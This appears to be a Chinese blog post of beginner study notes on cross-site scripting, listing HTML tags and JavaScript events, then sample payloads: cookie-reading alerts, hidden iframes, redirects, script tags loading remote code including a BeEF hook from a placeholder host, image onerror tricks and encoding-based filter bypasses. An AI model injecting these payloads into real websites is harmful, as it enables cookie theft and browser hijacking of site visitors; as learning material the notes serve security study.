zoukankan      html  css  js  c++  java
  • 跨站脚本攻击xss

    1、 构造xss脚本

    常用HTML标签

    <iframe> 创建一个包含另一个文件的内联框架
    <textarea>
    <img>
    <script>可以通过src指向其他网页
    type元素必须的
    常用做图像操作,表单验证,动态内容更新

    常用js函数

    alert 
    window.locateion 获得当前页面的url
    location.href 显示当前页面的完整url
    onload 完成夹在
    onsubmit 确认按钮被惦记
    onerror 加载文档时或者图像时发生错误

    构造xss脚本

    弹窗警告
    <script>alert('xss')</script>
    <script>alert(document.cookie)</script>
    ​
    页面嵌套
    <iframe src=http://www.baidu.com width=0 hight=0></iframe>
    ​
    页面重定向
    <script>window.location="http://www.baidu.com"</script>
    <script>location.href="http://www.baidu.com"</script>
    ​
    弹窗警告并重定向
    <script>alert('请移步到我们的新网站');location.href="http://www.baidu.com"</script>
    ​
    访问恶意代码
    <script src="http://www.baidu.com/xss.js"></script>
    <script src="http://BeEF_ip:3000/hook.js"></script>
    ​
    巧用图片标签
    <img src="#" onerror-alert('xss')>
    <img src="javascript:alert('xss');">
    <img src="http://BeEf_ip:3000/hook.js">
    ​
    绕开过滤脚本
    大小写
    字符编码,采用url,base64等编码

    2、分类

    反射性xss
    存储型xss

    3、自动化xss:BeEF

  • 相关阅读:
    PAT Advanced 1073 Scientific Notation (20 分)
    PAT Advanced 1071 Speech Patterns (25 分)
    C++ 正则查找
    PAT Advanced 1022 Digital Library (30 分)
    Linux文件系统及常用命令
    Elasticsearch常用查询
    Sublime Text3 快捷键
    Lua函数
    线程池
    Jdk8新特性之Base64
  • 原文地址:https://www.cnblogs.com/zyh0430/p/11203964.html
Copyright © 2011-2022 走看看